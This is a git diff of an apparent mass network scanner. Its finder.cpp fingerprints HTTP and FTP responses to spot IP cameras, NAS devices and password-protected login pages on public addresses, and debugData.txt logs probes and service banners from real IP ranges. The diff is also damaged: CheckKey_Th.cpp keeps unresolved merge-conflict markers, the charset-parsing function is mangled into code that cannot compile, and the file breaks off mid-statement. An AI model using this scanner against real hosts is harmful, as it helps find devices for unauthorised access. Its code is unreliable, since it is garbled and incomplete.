diff --git a/00000036.wav b/00000036.wav new file mode 100644 index 0000000..8466549 Binary files /dev/null and b/00000036.wav differ diff --git a/CheckKey_Th.cpp b/CheckKey_Th.cpp index 6ee1ba7..64dccb8 100644 --- a/CheckKey_Th.cpp +++ b/CheckKey_Th.cpp @@ -212,9 +212,15 @@ int KeyCheckerMain() if(strstr(msg, "202 Accepted") != NULL) { +<<<<<<< HEAD stt->doEmitionGreenFoundData("[Key check] -OK. Key is valid!"); +======= +#pragma region QTGUI_Area + stt->doEmitionGreenFoundData("[Key check] -OK. Key is valid!"); +#pragma endregion +>>>>>>> 1f26df077976493c1916f7764c83dc03da1445fa CSSOCKET(sock); if(emitIfOK == 0) stt->doEmitionStartScanIP(); @@ -224,11 +230,19 @@ int KeyCheckerMain() } else if(strstr(msg, "400 Bad Request") != NULL) { +<<<<<<< HEAD QString errorDef = GetNSErrorDefinition(msg, "notify"); if(errorDef == "Invalid access key") stt->doEmitionYellowFoundData("[NS-Track] [Key is unauthorized] A valid key is required."); else stt->doEmitionYellowFoundData("[NS-Track] -FAIL! [400 Bad Request : " + GetNSErrorDefinition(msg, "notify") + "]"); +======= +#pragma region QTGUI_Area + QString errorDef = GetNSErrorDefinition(msg, "notify"); + if(errorDef == "Invalid access key") stt->doEmitionYellowFoundData("[NS-Track] [Key is unauthorized] A valid key is required."); + else stt->doEmitionYellowFoundData("[NS-Track] -FAIL! [400 Bad Request : " + GetNSErrorDefinition(msg, "notify") + "]"); +#pragma endregion +>>>>>>> 1f26df077976493c1916f7764c83dc03da1445fa CSSOCKET(sock); return -1; } @@ -240,12 +254,20 @@ int KeyCheckerMain() } else { +<<<<<<< HEAD +======= +#pragma region QTGUI_Area +>>>>>>> 1f26df077976493c1916f7764c83dc03da1445fa char header[64] = {0}; getSubStrEx(msg, "http/1.1 ", "\r\n", header, 64); stt->doEmitionYellowFoundData("[Key check] -FAIL! An error occured. (" + QString::number(WSAGetLastError()) + ") Header: " + QString::fromLocal8Bit(header) + ""); if(gDebugMode) stt->doEmitionDebugFoundData(QString(msg)); +<<<<<<< HEAD +======= +#pragma endregion +>>>>>>> 1f26df077976493c1916f7764c83dc03da1445fa CSSOCKET(sock); return -1; }; @@ -255,12 +277,20 @@ int KeyCheckerMain() } else { +<<<<<<< HEAD +======= +#pragma region QTGUI_Area +>>>>>>> 1f26df077976493c1916f7764c83dc03da1445fa stt->doEmitionRedFoundData("[Key check] -Balancer replied with invalid string."); if(gDebugMode) stt->doEmitionDebugFoundData(QString(msg)); CSSOCKET(sock); return -1; +<<<<<<< HEAD +======= +#pragma endregion +>>>>>>> 1f26df077976493c1916f7764c83dc03da1445fa }; }; diff --git a/ClassDiagram1.cd b/ClassDiagram1.cd new file mode 100644 index 0000000..0519ecb --- /dev/null +++ b/ClassDiagram1.cd @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/debugData.txt b/debugData.txt new file mode 100644 index 0000000..e190a25 --- /dev/null +++ b/debugData.txt @@ -0,0 +1,227 @@ +========================== +SSH-2.0-dropbear_0.48 + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.6:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220-MegaBit Gear TE4121C FTP server ready +220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) +530 USER and PASS required +530 USER and PASS required + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.25:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 (vsFTPd 1.2.0) +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.44:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220-MegaBit Gear TE4121C FTP server ready +220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) +530 USER and PASS required +530 USER and PASS required + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.65:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220-MegaBit Gear TE4121C FTP server ready +220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) +530 USER and PASS required +530 USER and PASS required + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.200:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220-MegaBit Gear TE4121C FTP server ready +220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) +530 USER and PASS required +530 USER and PASS required + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.144.207:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 Simple FTPd welcomes you. + + + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.147.250:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 FTP server ready. +500 'GET' command not understood. + +========================== +========================== + +========================== +SSH-2.0-dropbear + +========================== +========================== + +========================== +SSH-2.0-dropbear + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.175.116:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 FTP server ready. +500 'GET' command not understood. + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.175.94:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 Simple FTPd welcomes you. + + + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.189.106:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 Simple FTPd welcomes you. + + + +========================== +========================== + +========================== +SSH-2.0-OpenSSH_6.6p1-hpn14v4 + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.3.13.167:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 ibs-soho FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready. +500 'GET / HTTP/1.1': command not understood. +500 'HOST: 222.3.13.167:21': command not understood. +500 'ACCEPT: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1': command not understood. +500 'ACCEPT-LANGUAGE: us-US,ru;q=0.9,en;q=0.8': command not understood. +500 'ACCEPT-CHARSET: iso-8859-1, utf-8, utf-16, *;q=0.1': command not understood. +500 'ACCEPT-ENCODING: text, identity, *;q=0': command not understood. +500 'USER-AGENT: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11': command not understood. +500 'CONNECTION: close': command not understood. +500 '': command not understood. + +========================== +========================== + diff --git a/finder.cpp b/finder.cpp new file mode 100644 index 0000000..0660acb --- /dev/null +++ b/finder.cpp @@ -0,0 +1,3045 @@ +#pragma once +#include "STh.h" +#include "mainResources.h" +#include "externFunctions.h" +#include "externData.h" + +char* __cdecl strstri(char *_Str, const char *_SubStr) +{ + if(_Str != NULL) + { + std::string _lowStr = toLowerStr(_Str); + std::string _lowSubStr = toLowerStr(_SubStr); + const char *resChar = strstr(_lowStr.c_str(), _lowSubStr.c_str()); + int offset = resChar - _lowStr.c_str(); + if(offset < 0) return NULL; + else return (char*)(_Str + offset); + }; +}; + +bool gGlobalTrackLocked = false; +char *_findFirst(char *str, char *delim) +{ + int sz = strlen(str); + int dsz = strlen(delim); + for(int i = 0; i < sz; ++i) + { + for(int j = 0; j < dsz; ++j) + { + if(str[i] == delim[j]) return (char *)(str + i); + }; + }; + + return NULL; +}; +char *_findLast(char *str, char *delim) +{ + int sz = strlen(str); + int dsz = strlen(delim); + int savedPosition = 0; + for(int i = 0; i < sz; ++i) + { + for(int j = 0; j < dsz; ++j) + { + if(str[i] == delim[j]) savedPosition = i; + }; + }; + + return (char *)(str + savedPosition); +}; +char *GetCodePage(char *str) +{ + char cdpg[32] = {0}; + if(strstri(str, "\n\r"); + if(temp4 != NULL) + { + int ln = (int)(temp4 - temp3 - strlen("charset=")); + if(ln > 16) + { + return "WTF?"; + }; + strncpy(cdpg, (char *)(temp3 + strlen("charset=")), (ln > 32) ? 32 : ln ); + if(strstri(cdpg, "%s") != NULL) return "UTF-8"; + return cdpg; + } + else + { + stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); + }; + } + else if(strstri((char *)(temp2 + strlen("\n\r"); + if(temp4 != NULL) + { + int ln = (int)(temp4 - temp3 - strlen("charset = ")); + if(ln > 16) + { + return "WTF?"; + }; + strncpy(cdpg, (char *)(temp3 + strlen("charset = ")), (ln > 32) ? 32 : ln ); + if(strstri(cdpg, "%s") != NULL) return "UTF-8"; + return cdpg; + } + else + { + stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); + }; + } + else if(strstri((char *)(temp2 + strlen("\n\r"); + if(temp4 != NULL) + { + int ln = (int)(temp4 - temp3 - strlen("charset =")); + if(ln > 16) + { + return "WTF?"; + }; + strncpy(cdpg, (char *)(temp3 + strlen("charset =")), (ln > 32) ? 32 : ln ); + if(strstri(cdpg, "%s") != NULL) return "UTF-8"; + return cdpg; + } + else + { + stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); + }; + } + else + { + if(strstri(str, "charset=") != NULL) + { + char *temp2 = strstri(str, "charset="); + char *temp3 = _findFirst((char *)(temp2 + strlen("charset=")), " \"'>\n\r"); + if(temp3 != NULL) + { + int ln = (int)(temp3 - temp2 - strlen("charset=")); + if(ln > 16) + { + return "WTF?"; + }; + strncpy(cdpg, (char *)(temp2 + strlen("charset=")), (ln > 32) ? 32 : ln ); + if(strstri(cdpg, "%s") != NULL) return "UTF-8"; + return cdpg; + } + else + { + stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); + } + } + else + { + return "NULL"; + }; + }; + } + else if(strstri(str, "charset=") != NULL) + { + char *temp2 = strstri(str, "charset="); + char *temp3 = _findFirst((char *)(temp2 + strlen("charset=")), " \"'\n\r"); + if(temp3 != NULL) + { + int ln = (int)(temp3 - temp2 - strlen("charset=")); + if(ln > 16) + { + return "WTF?"; + }; + strncpy(cdpg, (char *)(temp2 + strlen("charset=")), (ln > 32) ? 32 : ln ); + if(strstri(cdpg, "%s") != NULL) return "UTF-8"; + return cdpg; + } + else + { + stt->doEmitionRedFoundData("[GetCodePage] [" + QString(temp3).mid(0, 16) + "]"); + }; + } + else + { + return "NULL"; + }; +}; +int Lexems::globalSearchNeg(const char *buffcpy, char *ip, int port) +{ + if(strlen(buffcpy) == 0) return -1; + + char negWord[256] = {0}; + for(int i = 0; i < GlobalNegativeSize; i++) + { + if(globalScanFlag) + { + strcpy(negWord, GlobalNegatives[i]); + if(strstr(buffcpy, negWord) != NULL) + { + if(gNegDebugMode) + { + stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "]\tNegative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\""); + if(strlen(negWord) < 2) + { + stt->doEmitionDebugFoundData(" Len:" + QString::number(strlen(negWord))); + }; + if(strcmp(negWord, "") == 0) + { + stt->doEmitionDebugFoundData("Empty hit!"); + }; + if(strcmp(negWord, " ") == 0) + { + stt->doEmitionDebugFoundData("Space hit!"); + }; + }; + ++Filt; + return -1; + }; + }; + ZeroMemory(negWord, 256); + }; + return 0; +}; +int globalSearchPrnt(char *buffcpy) +{ + if(strstr(buffcpy, "en/_top.htm") != NULL || strstr(buffcpy, "cannon http server") != NULL + || strstr(buffcpy, "konica minolta") != NULL || strstr(buffcpy, "/eng/home_frm.htm") != NULL + || strstr(buffcpy, "networkScanner webserver") != NULL || strstr(buffcpy, "/eng/htm/top.htm") != NULL + || strstr(buffcpy, "pages/t_ixdmy.htm") != NULL + || strstr(buffcpy, "/web/guest/") != NULL || strstr(buffcpy, "printerInfo") != NULL + || strstr(buffcpy, "hp photosmart") != NULL + || strstr(buffcpy, "menu and") != NULL + || strstr(buffcpy, "hewlett packard") != NULL + || strstr(buffcpy, "laserjet") != NULL || strstr(buffcpy, "supplies summary") != NULL + || strstr(buffcpy, "seiko epson") != NULL || strstr(buffcpy, "ink_y.png") != NULL + || strstr(buffcpy, "epsonnet") != NULL || strstr(buffcpy, "printer name") != NULL + ) + { + if(gNegDebugMode) + { + stt->doEmitionDebugFoundData("Printer detected."); + }; + return -1; + }; +}; + +// 500 < 1600 +Lexems lxf; +int _mainFinderFirst(char *buffcpy, int f, int port, char *ip) +{ + if((strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL ) + || strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL) + ) + && strstr(buffcpy, "digest realm") != NULL + && strstr(buffcpy, "basic realm") == NULL + ) return 101; + if(strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL ) + || strstr(buffcpy, "401 unauthorized access denied") != NULL || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, " 401\r\n") != NULL) + ) return 1; + if(strstr(buffcpy, "netwave ip camera")) return 11; + if(strstr(buffcpy, "live view / - axis")) return 12; + if(strstr(buffcpy, "vilar ipcamera")) return 13; + if(strstr(buffcpy, "window.location = \"rdr.cgi\"")) return 14; + if(strstr(buffcpy, "httpfileserver")) return 15; + if(((strstr(buffcpy, "220") != NULL && port == 21) || + strstr(buffcpy, "220 diskstation ftp server ready") != NULL || + strstr(buffcpy, "220 ftp server ready") != NULL || + strstr(buffcpy, "500 'get': command not understood") != NULL + ) + && strstr(buffcpy, "firewall authentication required") == NULL) return 16; // 16 - FTP + if(strstr(buffcpy, "real-time ip camera monitoring system") != NULL || + strstr(buffcpy, "server push mode") != NULL + ) return 17; //Real-time IP Camera Monitoring System + if(strstr(buffcpy, "linksys.com") != NULL && strstr(buffcpy, "tm05") != NULL) return 18; //linksys.com cameras + if(strstr(buffcpy, "reecam ip camera") != NULL) return 19; //reecam cameras + if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras + if(strstr(buffcpy, "bridge eyeon") != NULL) return 21; //Bridge Eyeon + if(strstr(buffcpy, "ip camera control webpage") != NULL && strstr(buffcpy, "/main/cs_motion.asp") != NULL) return 22; //ip camera control + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/live/index2.html") != NULL) return 23; //network camera BB-SC384 + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/en/live.html") != NULL) return 24; //Network Camera VB-M40 + if(strstr(buffcpy, "panasonic ") != NULL && strstr(buffcpy, ":60002/snapshotjpeg") != NULL) return 25; //Panasonic wtfidonteven-camera + if(strstr(buffcpy, "sony network camera") != NULL && strstr(buffcpy, "/command/inquiry.cgi?") != NULL) return 26; //Sony Network Camera + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "src=\"webs.cgi?") != NULL) return 27; //UA Network Camera + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/index.html") != NULL) return 28; //Network Camera VB-M40 + if(strstr(buffcpy, "lg smart ip device") != NULL) return 29; //LG Smart IP Device Camera + if(strstr(buffcpy, "nas") != NULL && strstr(buffcpy, "/cgi-bin/data/viostor-220/viostor/viostor.cgi") != NULL) return 30; //NAX + if(strstr(buffcpy, "ip camera") != NULL && strstr(buffcpy, "check_user.cgi") != NULL) return 31; //ip cams + if(strstr(buffcpy, "ws(\"user\");") != NULL && strstr(buffcpy, "src=\"/tool.js") != NULL + && strstr(buffcpy, "") != NULL) return 32; //IPC web ip cam + if(strstr(buffcpy, "geovision") != NULL && (strstr(buffcpy, "ip camera") != NULL + || strstr(buffcpy, "ssi.cgi/login.htm") != NULL)) return 33; //GEO web ip cam + if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL + && strstr(buffcpy, "dvrdvs-webs") != NULL) + || (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL + && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam + if((strstr(buffcpy, "easy cam") != NULL && strstr(buffcpy, "easy life") != NULL) + || strstr(buffcpy, "ipcamera") != NULL && strstr(buffcpy, "/tool.js") != NULL) return 35; //EasyCam + if(strstr(buffcpy, "/config/cam_portal.cgi") != NULL || strstr(buffcpy, "/config/easy_index.cgi") != NULL) return 36; //Panasonic Cam + if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/view/getuid.cgi") != NULL) return 37; //Panasonic Cam WJ-HD180 + if(strstr(buffcpy, "ipcam client") != NULL && strstr(buffcpy, "plugins.xpi") != NULL + && strstr(buffcpy, "js/upfile.js") != NULL) return 38; //Foscam + if(strstr(buffcpy, "ip surveillance") != NULL && strstr(buffcpy, "customer login") != NULL) return 39; //EagleEye + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/admin/index.shtml?") != NULL) return 40; //Network Camera VB-C300 + if(strstr(buffcpy, "sq-webcam") != NULL && strstr(buffcpy, "liveview.html") != NULL) return 41; //AVIOSYS-camera + if(strstr(buffcpy, "nw_camera") != NULL && strstr(buffcpy, "/cgi-bin/getuid") != NULL) return 42; //NW_camera + if(strstr(buffcpy, "micros") != NULL && strstr(buffcpy, "/gui/gui_outer_frame.shtml") != NULL) return 43; //NW_camera + if(strstr(buffcpy, "lapassword") != NULL + && strstr(buffcpy, "lausername") != NULL + && strstr(buffcpy, "g_ologin.dologin()") != NULL + ) return 44; //hikvision cam 2 + if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG??? + if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk + if(strstr(buffcpy, "digital video server") != NULL && strstr(buffcpy, "gui.css") != NULL) return 47; //Digital Video Server + if(strstr(buffcpy, "/ipcamerasetup.zip") != NULL && strstr(buffcpy, "download player") != NULL + && strstr(buffcpy, "ipcam") != NULL) return 48; //ipCam + if(strstr(buffcpy, "dvr") != NULL && strstr(buffcpy, "ieorforefox") != NULL + && strstr(buffcpy, "sofari") != NULL) return 49; //IEORFOREFOX + + if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL + || strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL + || strstr(buffcpy, "hfs /") != NULL || strstr(buffcpy, "httpfileserver") != NULL + || strstr(buffcpy, "network camera") != NULL + || strstr(buffcpy, "$lock extended") != NULL || strstr(buffcpy, "ip camera") != NULL + || strstr(buffcpy, "/viewer/video.jpg") != NULL || strstr(buffcpy, "smart ip device") != NULL + || strstr(buffcpy, "sanpshot_icon") != NULL || strstr(buffcpy, "snapshot_icon") != NULL + || strstr(buffcpy, "ipcam") != NULL + ) return 0; + + if(lxf.globalSearchNeg(buffcpy, ip, port) == -1) return -1; + if(globalSearchPrnt(buffcpy) == -1) return -1; + if(strstr(buffcpy, "
1600 +int _mainFinderSecond(char *buffcpy, int port, char *ip) +{ + if((strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL + || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL ) + || strstr(buffcpy, "401 unauthorized access denied") != NULL + || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL + && strstr(buffcpy, " 401\r\n") != NULL) + ) + && strstr(buffcpy, "digest realm") != NULL && strstr(buffcpy, "basic realm") == NULL + ) return 101; + if(strstr(buffcpy, "401 authorization") != NULL || strstr(buffcpy, "401 unauthorized") != NULL + || (strstr(buffcpy, "www-authenticate") != NULL && strstr(buffcpy, "401 ") != NULL ) + || strstr(buffcpy, "401 unauthorized access denied") != NULL + || strstr(buffcpy, "401 unauthorised") != NULL || (strstr(buffcpy, "www-authenticate") != NULL + && strstr(buffcpy, " 401\r\n") != NULL) + ) return 1; + if(strstr(buffcpy, "netwave ip camera")) return 11; + if(strstr(buffcpy, "live view / - axis")) return 12; + if(strstr(buffcpy, "vilar ipcamera")) return 13; + if(strstr(buffcpy, "window.location = \"rdr.cgi\"")) return 14; + if(strstr(buffcpy, "httpfileserver")) return 15; + if(strstr(buffcpy, "real-time ip camera monitoring system") != NULL || + strstr(buffcpy, "server push mode") != NULL + ) return 17; //Real-time IP Camera Monitoring System + if(strstr(buffcpy, "linksys.com") != NULL && strstr(buffcpy, "tm05") != NULL) return 18; //linksys.com cameras + if(strstr(buffcpy, "reecam ip camera") != NULL) return 19; //reecam cameras + if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras + if(strstr(buffcpy, "bridge eyeon") != NULL) return 21; //Bridge Eyeon + if(strstr(buffcpy, "ip camera control webpage") != NULL && strstr(buffcpy, "/main/cs_motion.asp") != NULL) return 22; //ip camera control + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/live/index2.html") != NULL) return 23; //network camera BB-SC384 + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/en/live.html") != NULL) return 24; //Network Camera VB-M40 + if(strstr(buffcpy, "panasonic ") != NULL && strstr(buffcpy, ":60002/snapshotjpeg") != NULL) return 25; //Panasonic wtfidonteven-camera + if(strstr(buffcpy, "sony network camera") != NULL && strstr(buffcpy, "/command/inquiry.cgi?") != NULL) return 26; //Sony Network Camera + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "src=\"webs.cgi?") != NULL) return 27; //UA Network Camera + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/viewer/live/index.html") != NULL) return 28; //Network Camera VB-M40 + if(strstr(buffcpy, "lg smart ip device") != NULL) return 29; //LG Smart IP Device Camera + if(strstr(buffcpy, "/view/viewer_index.shtml") != NULL) return 20; //axis cameras + if(strstr(buffcpy, "nas") != NULL && strstr(buffcpy, "/cgi-bin/data/viostor-220/viostor/viostor.cgi") != NULL) return 30; //NAX + if(strstr(buffcpy, "ip camera") != NULL && strstr(buffcpy, "check_user.cgi") != NULL) return 31; //axis cameras + if(strstr(buffcpy, "ws(\"user\");") != NULL && strstr(buffcpy, "src=\"/tool.js") != NULL && strstr(buffcpy, "") != NULL) return 32; //web ip cam + if(strstr(buffcpy, "geovision") != NULL && (strstr(buffcpy, "ip camera") != NULL || strstr(buffcpy, "ssi.cgi/login.htm") != NULL)) return 33; //GEO web ip cam + if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL) + || (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam + if((strstr(buffcpy, "easy cam") != NULL && strstr(buffcpy, "easy life") != NULL) + || strstr(buffcpy, "ipcamera") != NULL && strstr(buffcpy, "/tool.js") != NULL) return 35; //EasyCam + if(strstr(buffcpy, "/config/cam_portal.cgi") != NULL || strstr(buffcpy, "/config/easy_index.cgi") != NULL) return 36; //Panasonic Cam + if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/view/getuid.cgi") != NULL) return 37; //Panasonic Cam WJ-HD180 + if(strstr(buffcpy, "ipcam client") != NULL && strstr(buffcpy, "plugins.xpi") != NULL && strstr(buffcpy, "js/upfile.js") != NULL) return 38; //Foscam + if(strstr(buffcpy, "ip surveillance") != NULL && strstr(buffcpy, "customer login") != NULL) return 39; //EagleEye + if(strstr(buffcpy, "network camera") != NULL && strstr(buffcpy, "/admin/index.shtml?") != NULL) return 40; //Network Camera VB-C300 + if(strstr(buffcpy, "sq-webcam") != NULL && strstr(buffcpy, "liveview.html") != NULL) return 41; //AVIOSYS-camera + if(strstr(buffcpy, "nw_camera") != NULL && strstr(buffcpy, "/cgi-bin/getuid") != NULL) return 42; //NW_camera + if(strstr(buffcpy, "micros") != NULL && strstr(buffcpy, "/gui/gui_outer_frame.shtml") != NULL) return 43; //NW_camera + if(strstr(buffcpy, "lapassword") != NULL + && strstr(buffcpy, "lausername") != NULL + && strstr(buffcpy, "g_ologin.dologin()") != NULL + ) return 44; //hikvision cam 2 + if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG??? + if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk + if(strstr(buffcpy, "digital video server") != NULL && strstr(buffcpy, "gui.css") != NULL) return 47; //Digital Video Server + if(strstr(buffcpy, "/ipcamerasetup.zip") != NULL && strstr(buffcpy, "download player") != NULL + && strstr(buffcpy, "ipcam") != NULL) return 48; //ipCam + if(strstr(buffcpy, "dvr") != NULL && 